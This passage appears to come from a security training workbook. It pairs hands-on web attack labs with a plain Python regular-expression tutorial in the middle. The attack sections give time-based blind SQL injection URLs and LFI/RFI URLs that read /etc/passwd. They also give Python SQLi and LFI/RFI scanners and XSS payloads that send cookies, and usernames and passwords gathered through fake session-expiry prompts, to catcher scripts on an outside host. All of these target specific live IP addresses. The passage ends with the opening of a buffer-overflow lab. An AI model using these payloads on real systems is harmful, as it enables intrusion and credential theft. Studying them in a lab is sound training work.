  2282. D - 1st Character
  2283. http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=97) WAITFOR DELAY '00:00:10'--
  2284. http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=98) WAITFOR DELAY '00:00:10'--
  2285. http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=99) WAITFOR DELAY '00:00:10'--
  2286. http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),1,1)))=100) WAITFOR DELAY '00:00:10'-- (Ok, first letter is a 100 which is the letter 'd' - it waited 10 seconds)
  2287.  
  2288. B - 2nd Character
  2289. http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  2290. http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),2,1)))=98) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  2291.  
  2292. O - 3rd Character
  2293. http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>97) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  2294. http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>115) WAITFOR DELAY '00:00:10'--
  2295. http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>105) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  2296. http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))>110) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  2297. http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=109) WAITFOR DELAY '00:00:10'--
  2298. http://54.245.184.121/bookdetail.aspx?id=2; IF (ASCII(lower(substring((USER),3,1)))=111) WAITFOR DELAY '00:00:10'-- Ok, good it waited for 10 seconds
  2299.  
  2300.  
  2301.  
  2302.  
  2303.  
  2304.  
  2305.  
  2306.  
  2307.  
  2308.  
  2309. ###############################################################################
  2310. # What is XSS #
  2311. # https://s3.amazonaws.com/infosecaddictsfiles/2-Intro_To_XSS.pptx #
  2312. ###############################################################################
  2313.  
  2314. OK - what is Cross Site Scripting (XSS)
  2315.  
  2316. 1. Use Firefox to browse to the following location:
  2317.  
  2318. http://45.63.104.73/xss_practice/
  2319.  
  2320. A really simple search page that is vulnerable should come up.
  2321.  
  2322.  
  2323.  
  2324.  
  2325. 2. In the search box type:
  2326.  
  2327. <script>alert('So this is XSS')</script>
  2328.  
  2329.  
  2330. This should pop-up an alert window with your message in it proving XSS is in fact possible.
  2331. Ok, click OK and then click back and go back to http://45.63.104.73/xss_practice/
  2332.  
  2333.  
  2334. 3. In the search box type:
  2335.  
  2336. <script>alert(document.cookie)</script>
  2337.  
  2338.  
  2339. This should pop-up an alert window with your message in it proving XSS is in fact possible and your cookie can be accessed.
  2340. Ok, click OK and then click back and go back to http://45.63.104.73/xss_practice/
  2341.  
  2342. 4. Now replace that alert script with:
  2343.  
  2344. <script>document.location="http://45.63.104.73/xss_practice/cookie_catcher.php?c="+document.cookie</script>
  2345.  
  2346.  
  2347. This will actually pass your cookie to the cookie catcher that we have sitting on the webserver.
  2348.  
  2349.  
  2350. 5. Now view the stolen cookie at:
  2351. http://45.63.104.73/xss_practice/cookie_stealer_logs.html
  2352.  
  2353.  
  2354. The cookie catcher writes to this file and all we have to do is make sure that it has permissions to be written to.
  2355.  
  2356.  
  2357.  
  2358.  
  2359.  
  2360.  
  2361. ############################
  2362. # A Better Way To Demo XSS #
  2363. ############################
  2364.  
  2365.  
  2366. Let's take this to the next level. We can modify this attack to include some username/password collection. Paste all of this into the search box.
  2367.  
  2368.  
  2369. Use Firefox to browse to the following location:
  2370.  
  2371. http://45.63.104.73/xss_practice/
  2372.  
  2373.  
  2374.  
  2375. Paste this in the search box
  2376. ----------------------------
  2377.  
  2378.  
  2379. Option 1
  2380. --------
  2381.  
  2382. <script>
  2383. password=prompt('Your session is expired. Please enter your password to continue',' ');
  2384. document.write("<img src=\"http://45.63.104.73/xss_practice/passwordgrabber.php?password=" +password+"\">");
  2385. </script>
  2386.  
  2387.  
  2388. Now view the stolen cookie at:
  2389. http://45.63.104.73/xss_practice/passwords.html
  2390.  
  2391.  
  2392.  
  2393. Option 2
  2394. --------
  2395. <script>
  2396. username=prompt('Please enter your username',' ');
  2397. password=prompt('Please enter your password',' ');
  2398. document.write("<img src=\"http://45.63.104.73/xss_practice/unpw_catcher.php?username="+username+"&password="+password+"\">");
  2399. </script>
  2400.  
  2401.  
  2402.  
  2403.  
  2404. Now view the stolen cookie at:
  2405. http://45.63.104.73/xss_practice/username_password_logs.html
  2406.  
  2407.  
  2408.  
  2409. ######################
  2410. # Lesson 27: Web App #
  2411. ######################
  2412. vi wpbruteforcer.py
  2413.  
  2414.  
  2415. python wpbruteforcer.py -t strategicsec.com -u j0e -w list.txt
  2416.  
  2417.  
  2418.  
  2419. - Here is an example of an LFI
  2420. - Open this page in Firefox:
  2421. http://45.63.104.73/showfile.php?filename=contactus.txt
  2422.  
  2423. - Notice the page name (showfile.php) and the parameter name (filename) and the filename (contactus.txt)
  2424. - Here you see a direct reference to a file on the local filesystem of the victim machine.
  2425. - You can attack this by doing the following:
  2426. http://45.63.104.73/showfile.php?filename=/etc/passwd
  2427.  
  2428. - This is an example of a Local File Include (LFI), to change this attack into a Remote File Include (RFI) you need some content from
  2429. - somewhere else on the Internet. Here is an example of a text file on the web:
  2430. http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt
  2431.  
  2432. - Now we can attack the target via RFI like this:
  2433. http://45.63.104.73/showfile.php?filename=http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt
  2434.  
  2435.  
  2436. - Now let's see if we can write some code to do this for us:
  2437.  
  2438. vi LFI-RFI.py
  2439.  
  2440.  
  2441.  
  2442. #!/usr/bin/env python
  2443. print "\n### PHP LFI/RFI Detector ###"
  2444. print "### Sean Arries 09/18/09 ###\n"
  2445.  
  2446. import urllib2,re,sys
  2447.  
  2448.  
  2449. TARGET = "http://45.63.104.73/showfile.php?filename=contactus.txt"
  2450. RFIVULN = "http://www.opensource.apple.com/source/SpamAssassin/SpamAssassin-127.2/SpamAssassin/t/data/etc/hello.txt?"
  2451. TravLimit = 12
  2452.  
  2453. print "==> Testing for LFI vulns.."
  2454. TARGET = TARGET.split("=")[0]+"=" ## URL MANUPLIATION
  2455. for x in xrange(1,TravLimit): ## ITERATE THROUGH THE LOOP
  2456. TARGET += "../"
  2457. try:
  2458. source = urllib2.urlopen((TARGET+"etc/passwd")).read() ## WEB REQUEST
  2459. except urllib2.URLError, e:
  2460. print "$$$ We had an Error:",e
  2461. sys.exit(0)
  2462. if re.search("root:x:0:0:",source): ## SEARCH FOR TEXT IN SOURCE
  2463. print "!! ==> LFI Found:",TARGET+"etc/passwd"
  2464. break ## BREAK LOOP WHEN VULN FOUND
  2465.  
  2466. print "\n==> Testing for RFI vulns.."
  2467. TARGET = TARGET.split("=")[0]+"="+RFIVULN ## URL MANUPLIATION
  2468. try:
  2469. source = urllib2.urlopen(TARGET).read() ## WEB REQUEST
  2470. except urllib2.URLError, e:
  2471. print "$$$ We had an Error:",e
  2472. sys.exit(0)
  2473. if re.search("j0e",source): ## SEARCH FOR TEXT IN SOURCE
  2474. print "!! => RFI Found:",TARGET
  2475.  
  2476.  
  2477. print "\nScan Complete\n" ## DONE
  2478.  
  2479.  
  2480.  
  2481.  
  2482.  
  2483.  
  2484.  
  2485.  
  2486.  
  2487.  
  2488. #!/usr/bin/env python
  2489. print "\n### PHP SQLi Detector ###"
  2490. print "### Sean Arries 09/18/09 ###\n"
  2491.  
  2492. import urllib2,re,sys
  2493.  
  2494. TARGET = "http://45.63.104.73/acre2.php?lap=Compaq"
  2495. SQLi = "'"
  2496. SQLiError = "You have an error in your SQL"
  2497. SQLiNull = "BennyLava"
  2498.  
  2499. print "==> Testing for SQLi Error Vuln..."
  2500. URL = TARGET+SQLi
  2501. try:
  2502. source = urllib2.urlopen(URL).read() ## WEB REQUEST
  2503. except urllib2.URLError, e:
  2504. print "$$$ We had an Error\n",e
  2505. sys.exit(0)
  2506. if re.search(SQLiError,source): ## SEARCH FOR ERROR IN PAGE
  2507. print "!! ==> SQLi Found:",TARGET+SQLi
  2508. print "## ==> Bruting NULL column...",
  2509. URL = TARGET+"+and+1=2+UNION+SELECT+" ## BUILD OUR SQLi STATEMENT
  2510. for x in xrange(1,99):
  2511. if x > 1:
  2512. URL = URL+","
  2513. URL = URL+"0x"+SQLiNull.encode("hex") ## ADD HEX ENCODED NULL WORD
  2514. print x,
  2515. try:
  2516. source = urllib2.urlopen((URL+"-- n")).read() ## WEB REQUEST
  2517. except urllib2.URLError, e:
  2518. print "$$$ We had an Error\n",e
  2519. sys.exit(0)
  2520. if re.search(SQLiNull,source): ## SEARCH FOR UNENCODED NULL WORD
  2521. print "\n!! ==> Null Column Found:",URL+"--"
  2522. break
  2523. else:
  2524. print "** ==> No SQLi Found!"
  2525. print "\nScan Complete\n"
  2526.  
  2527. #######################
  2528. # Regular Expressions #
  2529. #######################
  2530.  
  2531.  
  2532.  
  2533. **************************************************
  2534. * What is Regular Expression and how is it used? *
  2535. **************************************************
  2536.  
  2537.  
  2538. Simply put, regular expression is a sequence of character(s) mainly used to find and replace patterns in a string or file.
  2539.  
  2540.  
  2541. Regular expressions use two types of characters:
  2542.  
  2543. a) Meta characters: As the name suggests, these characters have a special meaning, similar to * in wildcard.
  2544.  
  2545. b) Literals (like a,b,1,2…)
  2546.  
  2547.  
  2548. In Python, we have module "re" that helps with regular expressions. So you need to import library re before you can use regular expressions in Python.
  2549.  
  2550.  
  2551. Use this code --> import re
  2552.  
  2553.  
  2554.  
  2555.  
  2556. The most common uses of regular expressions are:
  2557. --------------------------------------------------
  2558.  
  2559. - Search a string (search and match)
  2560. - Finding a string (findall)
  2561. - Break string into a sub strings (split)
  2562. - Replace part of a string (sub)
  2563.  
  2564.  
  2565.  
  2566. Let's look at the methods that library "re" provides to perform these tasks.
  2567.  
  2568.  
  2569.  
  2570. ****************************************************
  2571. * What are various methods of Regular Expressions? *
  2572. ****************************************************
  2573.  
  2574.  
  2575. The ‘re' package provides multiple methods to perform queries on an input string. Here are the most commonly used methods, I will discuss:
  2576.  
  2577. re.match()
  2578. re.search()
  2579. re.findall()
  2580. re.split()
  2581. re.sub()
  2582. re.compile()
  2583.  
  2584. Let's look at them one by one.
  2585.  
  2586.  
  2587. re.match(pattern, string):
  2588. -------------------------------------------------
  2589.  
  2590. This method finds match if it occurs at start of the string. For example, calling match() on the string ‘AV Analytics AV' and looking for a pattern ‘AV' will match. However, if we look for only Analytics, the pattern will not match. Let's perform it in python now.
  2591.  
  2592. Code
  2593.  
  2594. import re
  2595. result = re.match(r'AV', 'AV Analytics ESET AV')
  2596. print result
  2597.  
  2598. Output:
  2599. <_sre.SRE_Match object at 0x0000000009BE4370>
  2600.  
  2601. Above, it shows that pattern match has been found. To print the matching string we'll use method group (It helps to return the matching string). Use "r" at the start of the pattern string, it designates a python raw string.
  2602.  
  2603.  
  2604. result = re.match(r'AV', 'AV Analytics ESET AV')
  2605. print result.group(0)
  2606.  
  2607. Output:
  2608. AV
  2609.  
  2610.  
  2611. Let's now find ‘Analytics' in the given string. Here we see that string is not starting with ‘AV' so it should return no match. Let's see what we get:
  2612.  
  2613.  
  2614. Code
  2615.  
  2616. result = re.match(r'Analytics', 'AV Analytics ESET AV')
  2617. print result
  2618.  
  2619.  
  2620. Output:
  2621. None
  2622.  
  2623.  
  2624. There are methods like start() and end() to know the start and end position of matching pattern in the string.
  2625.  
  2626. Code
  2627.  
  2628. result = re.match(r'AV', 'AV Analytics ESET AV')
  2629. print result.start()
  2630. print result.end()
  2631.  
  2632. Output:
  2633. 0
  2634. 2
  2635.  
  2636. Above you can see that start and end position of matching pattern ‘AV' in the string and sometime it helps a lot while performing manipulation with the string.
  2637.  
  2638.  
  2639.  
  2640.  
  2641.  
  2642. re.search(pattern, string):
  2643. -----------------------------------------------------
  2644.  
  2645.  
  2646. It is similar to match() but it doesn't restrict us to find matches at the beginning of the string only. Unlike previous method, here searching for pattern ‘Analytics' will return a match.
  2647.  
  2648. Code
  2649.  
  2650. result = re.search(r'Analytics', 'AV Analytics ESET AV')
  2651. print result.group(0)
  2652.  
  2653. Output:
  2654. Analytics
  2655.  
  2656. Here you can see that, search() method is able to find a pattern from any position of the string but it only returns the first occurrence of the search pattern.
  2657.  
  2658.  
  2659.  
  2660.  
  2661.  
  2662.  
  2663. re.findall (pattern, string):
  2664. ------------------------------------------------------
  2665.  
  2666.  
  2667. It helps to get a list of all matching patterns. It has no constraints of searching from start or end. If we will use method findall to search ‘AV' in given string it will return both occurrence of AV. While searching a string, I would recommend you to use re.findall() always, it can work like re.search() and re.match() both.
  2668.  
  2669.  
  2670. Code
  2671.  
  2672. result = re.findall(r'AV', 'AV Analytics ESET AV')
  2673. print result
  2674.  
  2675. Output:
  2676. ['AV', 'AV']
  2677.  
  2678.  
  2679.  
  2680.  
  2681.  
  2682. re.split(pattern, string, [maxsplit=0]):
  2683. ------------------------------------------------------
  2684.  
  2685.  
  2686.  
  2687. This methods helps to split string by the occurrences of given pattern.
  2688.  
  2689.  
  2690. Code
  2691.  
  2692. result=re.split(r'y','Analytics')
  2693. result
  2694.  
  2695. Output:
  2696. ['Anal', 'tics']
  2697.  
  2698. Above, we have split the string "Analytics" by "y". Method split() has another argument "maxsplit". It has default value of zero. In this case it does the maximum splits that can be done, but if we give value to maxsplit, it will split the string. Let's look at the example below:
  2699.  
  2700.  
  2701. Code
  2702.  
  2703. result=re.split(r's','Analytics eset')
  2704. print result
  2705.  
  2706. Output:
  2707. ['Analytic', 'e', 'et'] #It has performed all the splits that can be done by pattern "s".
  2708.  
  2709. Code
  2710.  
  2711. result=re.split(r's','Analytics eset',maxsplit=1)
  2712. result
  2713.  
  2714. Output:
  2715. ['Analytic', 'eset']
  2716.  
  2717. Here, you can notice that we have fixed the maxsplit to 1. And the result is, it has only two values whereas first example has three values.
  2718.  
  2719.  
  2720.  
  2721.  
  2722. re.sub(pattern, repl, string):
  2723. ----------------------------------------------------------
  2724.  
  2725. It helps to search a pattern and replace with a new sub string. If the pattern is not found, string is returned unchanged.
  2726.  
  2727. Code
  2728.  
  2729. result=re.sub(r'Ruby','Python','Joe likes Ruby')
  2730. result
  2731. Output:
  2732. 'Joe likes Python'
  2733.  
  2734.  
  2735.  
  2736.  
  2737.  
  2738. re.compile(pattern, repl, string):
  2739. ----------------------------------------------------------
  2740.  
  2741.  
  2742. We can combine a regular expression pattern into pattern objects, which can be used for pattern matching. It also helps to search a pattern again without rewriting it.
  2743.  
  2744.  
  2745. Code
  2746.  
  2747. import re
  2748. pattern=re.compile('XSS')
  2749. result=pattern.findall('XSS is Cross Site Sripting, XSS')
  2750. print result
  2751. result2=pattern.findall('XSS is Cross Site Scripting, SQLi is Sql Injection')
  2752. print result2
  2753. Output:
  2754. ['XSS', 'XSS']
  2755. ['XSS']
  2756.  
  2757. Till now, we looked at various methods of regular expression using a constant pattern (fixed characters). But, what if we do not have a constant search pattern and we want to return specific set of characters (defined by a rule) from a string? Don't be intimidated.
  2758.  
  2759. This can easily be solved by defining an expression with the help of pattern operators (meta and literal characters). Let's look at the most common pattern operators.
  2760.  
  2761.  
  2762.  
  2763.  
  2764.  
  2765. **********************************************
  2766. * What are the most commonly used operators? *
  2767. **********************************************
  2768.  
  2769.  
  2770. Regular expressions can specify patterns, not just fixed characters. Here are the most commonly used operators that helps to generate an expression to represent required characters in a string or file. It is commonly used in web scrapping and text mining to extract required information.
  2771.  
  2772. Operators Description
  2773. . Matches with any single character except newline ‘\n'.
  2774. ? match 0 or 1 occurrence of the pattern to its left
  2775. + 1 or more occurrences of the pattern to its left
  2776. * 0 or more occurrences of the pattern to its left
  2777. \w Matches with a alphanumeric character whereas \W (upper case W) matches non alphanumeric character.
  2778. \d Matches with digits [0-9] and /D (upper case D) matches with non-digits.
  2779. \s Matches with a single white space character (space, newline, return, tab, form) and \S (upper case S) matches any non-white space character.
  2780. \b boundary between word and non-word and /B is opposite of /b
  2781. [..] Matches any single character in a square bracket and [^..] matches any single character not in square bracket
  2782. \ It is used for special meaning characters like \. to match a period or \+ for plus sign.
  2783. ^ and $ ^ and $ match the start or end of the string respectively
  2784. {n,m} Matches at least n and at most m occurrences of preceding expression if we write it as {,m} then it will return at least any minimum occurrence to max m preceding expression.
  2785. a| b Matches either a or b
  2786. ( ) Groups regular expressions and returns matched text
  2787. \t, \n, \r Matches tab, newline, return
  2788.  
  2789.  
  2790. For more details on meta characters "(", ")","|" and others details , you can refer this link (https://docs.python.org/2/library/re.html).
  2791.  
  2792. Now, let's understand the pattern operators by looking at the below examples.
  2793.  
  2794.  
  2795.  
  2796. ****************************************
  2797. * Some Examples of Regular Expressions *
  2798. ****************************************
  2799.  
  2800. ******************************************************
  2801. * Problem 1: Return the first word of a given string *
  2802. ******************************************************
  2803.  
  2804.  
  2805. Solution-1 Extract each character (using "\w")
  2806. ---------------------------------------------------------------------------
  2807.  
  2808. Code
  2809.  
  2810. import re
  2811. result=re.findall(r'.','Python is the best scripting language')
  2812. print result
  2813.  
  2814. Output:
  2815. ['P', 'y', 't', 'h', 'o', 'n', ' ', 'i', 's', ' ', 't', 'h', 'e', ' ', 'b', 'e', 's', 't', ' ', 's', 'c', 'r', 'i', 'p', 't', 'i', 'n', 'g', ' ', 'l', 'a', 'n', 'g', 'u', 'a', 'g', 'e']
  2816.  
  2817.  
  2818. Above, space is also extracted, now to avoid it use "\w" instead of ".".
  2819.  
  2820.  
  2821. Code
  2822.  
  2823. result=re.findall(r'\w','Python is the best scripting language')
  2824. print result
  2825.  
  2826. Output:
  2827. ['P', 'y', 't', 'h', 'o', 'n', 'i', 's', 't', 'h', 'e', 'b', 'e', 's', 't', 's', 'c', 'r', 'i', 'p', 't', 'i', 'n', 'g', 'l', 'a', 'n', 'g', 'u', 'a', 'g', 'e']
  2828.  
  2829.  
  2830.  
  2831.  
  2832. Solution-2 Extract each word (using "*" or "+")
  2833. ---------------------------------------------------------------------------
  2834.  
  2835. Code
  2836.  
  2837. result=re.findall(r'\w*','Python is the best scripting language')
  2838. print result
  2839.  
  2840. Output:
  2841. ['Python', '', 'is', '', 'the', '', 'best', '', 'scripting', '', 'language', '']
  2842.  
  2843.  
  2844. Again, it is returning space as a word because "*" returns zero or more matches of pattern to its left. Now to remove spaces we will go with "+".
  2845.  
  2846. Code
  2847.  
  2848. result=re.findall(r'\w+','Python is the best scripting language')
  2849. print result
  2850. Output:
  2851. ['Python', 'is', 'the', 'best', 'scripting', 'language']
  2852.  
  2853.  
  2854.  
  2855.  
  2856.  
  2857. Solution-3 Extract each word (using "^")
  2858. -------------------------------------------------------------------------------------
  2859.  
  2860.  
  2861. Code
  2862.  
  2863. result=re.findall(r'^\w+','Python is the best scripting language')
  2864. print result
  2865.  
  2866. Output:
  2867. ['Python']
  2868.  
  2869. If we will use "$" instead of "^", it will return the word from the end of the string. Let's look at it.
  2870.  
  2871. Code
  2872.  
  2873. result=re.findall(r'\w+$','Python is the best scripting language')
  2874. print result
  2875. Output:
  2876. [‘language']
  2877.  
  2878.  
  2879.  
  2880.  
  2881.  
  2882. **********************************************************
  2883. * Problem 2: Return the first two character of each word *
  2884. **********************************************************
  2885.  
  2886.  
  2887.  
  2888.  
  2889. Solution-1 Extract consecutive two characters of each word, excluding spaces (using "\w")
  2890. ------------------------------------------------------------------------------------------------------
  2891.  
  2892. Code
  2893.  
  2894. result=re.findall(r'\w\w','Python is the best')
  2895. print result
  2896.  
  2897. Output:
  2898. ['Py', 'th', 'on', 'is,', 'th', 'eb', 'es']
  2899.  
  2900.  
  2901.  
  2902.  
  2903.  
  2904.  
  2905. Solution-2 Extract consecutive two characters those available at start of word boundary (using "\b")
  2906. ------------------------------------------------------------------------------------------------------
  2907.  
  2908. Code
  2909.  
  2910. result=re.findall(r'\b\w.','Python is the best')
  2911. print result
  2912.  
  2913. Output:
  2914. ['Py', 'is,', 'th', 'be']
  2915.  
  2916.  
  2917.  
  2918.  
  2919.  
  2920.  
  2921. ********************************************************
  2922. * Problem 3: Return the domain type of given email-ids *
  2923. ********************************************************
  2924.  
  2925.  
  2926. To explain it in simple manner, I will again go with a stepwise approach:
  2927.  
  2928.  
  2929.  
  2930.  
  2931.  
  2932. Solution-1 Extract all characters after "@"
  2933. ------------------------------------------------------------------------------------------------------------------
  2934.  
  2935. Code
  2936.  
  2937. result=re.findall(r'@\w+','abc.test@gmail.com, xyz@test.com, test.first@strategicsec.com, first.test@rest.biz')
  2938. print result
  2939.  
  2940. Output: ['@gmail', '@test', '@strategicsec', '@rest']
  2941.  
  2942.  
  2943.  
  2944. Above, you can see that ".com", ".biz" part is not extracted. To add it, we will go with below code.
  2945.  
  2946.  
  2947. result=re.findall(r'@\w+.\w+','abc.test@gmail.com, xyz@test.com, test.first@strategicsec.com, first.test@rest.biz')
  2948. print result
  2949.  
  2950. Output:
  2951. ['@gmail.com', '@test.com', '@strategicsec.com', '@rest.biz']
  2952.  
  2953.  
  2954.  
  2955.  
  2956.  
  2957.  
  2958. Solution – 2 Extract only domain name using "( )"
  2959. -----------------------------------------------------------------------------------------------------------------------
  2960.  
  2961.  
  2962. Code
  2963.  
  2964. result=re.findall(r'@\w+.(\w+)','abc.test@gmail.com, xyz@test.com, test.first@strategicsec.com, first.test@rest.biz')
  2965. print result
  2966.  
  2967. Output:
  2968. ['com', 'com', 'com', 'biz']
  2969.  
  2970.  
  2971.  
  2972.  
  2973.  
  2974.  
  2975. ********************************************
  2976. * Problem 4: Return date from given string *
  2977. ********************************************
  2978.  
  2979.  
  2980. Here we will use "\d" to extract digit.
  2981.  
  2982.  
  2983. Solution:
  2984. ----------------------------------------------------------------------------------------------------------------------
  2985.  
  2986. Code
  2987.  
  2988. result=re.findall(r'\d{2}-\d{2}-\d{4}','Joe 34-3456 12-05-2007, XYZ 56-4532 11-11-2016, ABC 67-8945 12-01-2009')
  2989. print result
  2990.  
  2991. Output:
  2992. ['12-05-2007', '11-11-2016', '12-01-2009']
  2993.  
  2994. If you want to extract only year again parenthesis "( )" will help you.
  2995.  
  2996.  
  2997. Code
  2998.  
  2999.  
  3000. result=re.findall(r'\d{2}-\d{2}-(\d{4})','Joe 34-3456 12-05-2007, XYZ 56-4532 11-11-2016, ABC 67-8945 12-01-2009')
  3001. print result
  3002.  
  3003. Output:
  3004. ['2007', '2016', '2009']
  3005.  
  3006.  
  3007.  
  3008.  
  3009.  
  3010. *******************************************************************
  3011. * Problem 5: Return all words of a string those starts with vowel *
  3012. *******************************************************************
  3013.  
  3014.  
  3015.  
  3016.  
  3017. Solution-1 Return each words
  3018. -----------------------------------------------------------------------------------------------------------------
  3019.  
  3020. Code
  3021.  
  3022. result=re.findall(r'\w+','Python is the best')
  3023. print result
  3024.  
  3025. Output:
  3026. ['Python', 'is', 'the', 'best']
  3027.  
  3028.  
  3029.  
  3030.  
  3031.  
  3032. Solution-2 Return words starts with alphabets (using [])
  3033. ------------------------------------------------------------------------------------------------------------------
  3034.  
  3035. Code
  3036.  
  3037. result=re.findall(r'[aeiouAEIOU]\w+','I love Python')
  3038. print result
  3039.  
  3040. Output:
  3041. ['I', 'ove', 'on']
  3042.  
  3043. Above you can see that it has returned "ove" and "on" from the mid of words. To drop these two, we need to use "\b" for word boundary.
  3044.  
  3045.  
  3046.  
  3047.  
  3048.  
  3049. Solution- 3
  3050. ------------------------------------------------------------------------------------------------------------------
  3051.  
  3052. Code
  3053.  
  3054. result=re.findall(r'\b[aeiouAEIOU]\w+','I love Python')
  3055. print result
  3056.  
  3057. Output:
  3058. []
  3059.  
  3060.  
  3061. In similar ways, we can extract words those starts with constant using "^" within square bracket.
  3062.  
  3063.  
  3064. Code
  3065.  
  3066. result=re.findall(r'\b[^aeiouAEIOU]\w+','I love Python')
  3067. print result
  3068.  
  3069. Output:
  3070. [' love', ' Python']
  3071.  
  3072. Above you can see that it has returned words starting with space. To drop it from output, include space in square bracket[].
  3073.  
  3074.  
  3075. Code
  3076.  
  3077. result=re.findall(r'\b[^aeiouAEIOU ]\w+','I love Python')
  3078. print result
  3079.  
  3080. Output:
  3081. ['love', 'Python']
  3082.  
  3083.  
  3084.  
  3085.  
  3086.  
  3087.  
  3088. *************************************************************************************************
  3089. * Problem 6: Validate a phone number (phone number must be of 10 digits and starts with 8 or 9) *
  3090. *************************************************************************************************
  3091.  
  3092.  
  3093. We have a list phone numbers in list "li" and here we will validate phone numbers using regular
  3094.  
  3095.  
  3096.  
  3097.  
  3098. Solution
  3099. -------------------------------------------------------------------------------------------------------------------------------------
  3100.  
  3101.  
  3102. Code
  3103.  
  3104. import re
  3105. li=['9999999999','999999-999','99999x9999']
  3106. for val in li:
  3107. if re.match(r'[8-9]{1}[0-9]{9}',val) and len(val) == 10:
  3108. print 'yes'
  3109. else:
  3110. print 'no'
  3111.  
  3112.  
  3113. Output:
  3114. yes
  3115. no
  3116. no
  3117.  
  3118.  
  3119.  
  3120.  
  3121.  
  3122. ******************************************************
  3123. * Problem 7: Split a string with multiple delimiters *
  3124. ******************************************************
  3125.  
  3126.  
  3127.  
  3128. Solution
  3129. ---------------------------------------------------------------------------------------------------------------------------
  3130.  
  3131.  
  3132. Code
  3133.  
  3134. import re
  3135. line = 'asdf fjdk;afed,fjek,asdf,foo' # String has multiple delimiters (";",","," ").
  3136. result= re.split(r'[;,\s]', line)
  3137. print result
  3138.  
  3139. Output:
  3140. ['asdf', 'fjdk', 'afed', 'fjek', 'asdf', 'foo']
  3141.  
  3142.  
  3143.  
  3144. We can also use method re.sub() to replace these multiple delimiters with one as space " ".
  3145.  
  3146.  
  3147. Code
  3148.  
  3149. import re
  3150. line = 'asdf fjdk;afed,fjek,asdf,foo'
  3151. result= re.sub(r'[;,\s]',' ', line)
  3152. print result
  3153.  
  3154. Output:
  3155. asdf fjdk afed fjek asdf foo
  3156.  
  3157.  
  3158.  
  3159.  
  3160. **************************************************
  3161. * Problem 8: Retrieve Information from HTML file *
  3162. **************************************************
  3163.  
  3164.  
  3165.  
  3166. I want to extract information from a HTML file (see below sample data). Here we need to extract information available between <td> and </td> except the first numerical index. I have assumed here that below html code is stored in a string str.
  3167.  
  3168.  
  3169.  
  3170. Sample HTML file (str)
  3171.  
  3172. <tr align="center"><td>1</td> <td>Noah</td> <td>Emma</td></tr>
  3173. <tr align="center"><td>2</td> <td>Liam</td> <td>Olivia</td></tr>
  3174. <tr align="center"><td>3</td> <td>Mason</td> <td>Sophia</td></tr>
  3175. <tr align="center"><td>4</td> <td>Jacob</td> <td>Isabella</td></tr>
  3176. <tr align="center"><td>5</td> <td>William</td> <td>Ava</td></tr>
  3177. <tr align="center"><td>6</td> <td>Ethan</td> <td>Mia</td></tr>
  3178. <tr align="center"><td>7</td> <td HTML>Michael</td> <td>Emily</td></tr>
  3179. Solution:
  3180.  
  3181.  
  3182.  
  3183. Code
  3184.  
  3185. result=re.findall(r'<td>\w+</td>\s<td>(\w+)</td>\s<td>(\w+)</td>',str)
  3186. print result
  3187.  
  3188. Output:
  3189. [('Noah', 'Emma'), ('Liam', 'Olivia'), ('Mason', 'Sophia'), ('Jacob', 'Isabella'), ('William', 'Ava'), ('Ethan', 'Mia'), ('Michael', 'Emily')]
  3190.  
  3191.  
  3192.  
  3193. You can read html file using library urllib2 (see below code).
  3194.  
  3195.  
  3196. Code
  3197.  
  3198. import urllib2
  3199. response = urllib2.urlopen('')
  3200. html = response.read()
  3201.  
  3202.  
  3203.  
  3204. #####################################
  3205. # Quick Stack Based Buffer Overflow #
  3206. #####################################
  3207.  
  3208. - You can download everything you need for this exercise (except netcat) from the link below
  3209. https://s3.amazonaws.com/infosecaddictsfiles/ExploitLab.zip
  3210.  
  3211. - Extract this zip file to your Desktop
  3212.  
  3213. - Go to folder C:\Users\Workshop\Desktop\ExploitLab\2-VulnServer, and run vulnserv.exe
  3214.  
  3215. - Open a new command prompt and type:
  3216. nc localhost 9999
  3217.  
  3218. - In the new command prompt window where you ran nc type:
  3219. HELP
  3220.  
  3221. - Go to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts
  3222. - Right-click on 1-simplefuzzer.py and choose the option edit with notepad++
  3223.  
  3224. - Now double-click on 1-simplefuzzer.py
  3225. - You'll notice that vulnserv.exe crashes. Be sure to note what command and the number of As it crashed on.
  3226.  
  3227.  
  3228. - Restart vulnserv, and run 1-simplefuzzer.py again. Be sure to note what command and the number of As it crashed on.
  3229.  
  3230. - Now go to folder C:\Users\Workshop\Desktop\ExploitLab\3-OllyDBG and start OllyDBG. Choose 'File' -> 'Attach' and attach to process vulnserv.exe
  3231.  
  3232. - Go back to folder C:\Users\Workshop\Desktop\ExploitLab\4-AttackScripts and double-click on 1-simplefuzzer.py.
  3233.  
  3234. - Take note of the registers (EAX, ESP, EBP, EIP) that have been overwritten with As (41s).
  3235.  
  3236. - Now isolate the crash by restarting your debugger and running script 2-3000chars.py
  3237.  
  3238. - Calculate the distance to EIP by running script 3-3000chars.py
  3239. - This script sends 3000 nonrepeating chars to vulserv.exe and populates EIP with the value: 396F4338
  3240.  
  3241. 4-count-chars-to-EIP.py
  3242. - In the previous script we see that EIP is overwritten with 396F4338 is 8 (38), C (43), o (6F), 9 (39)
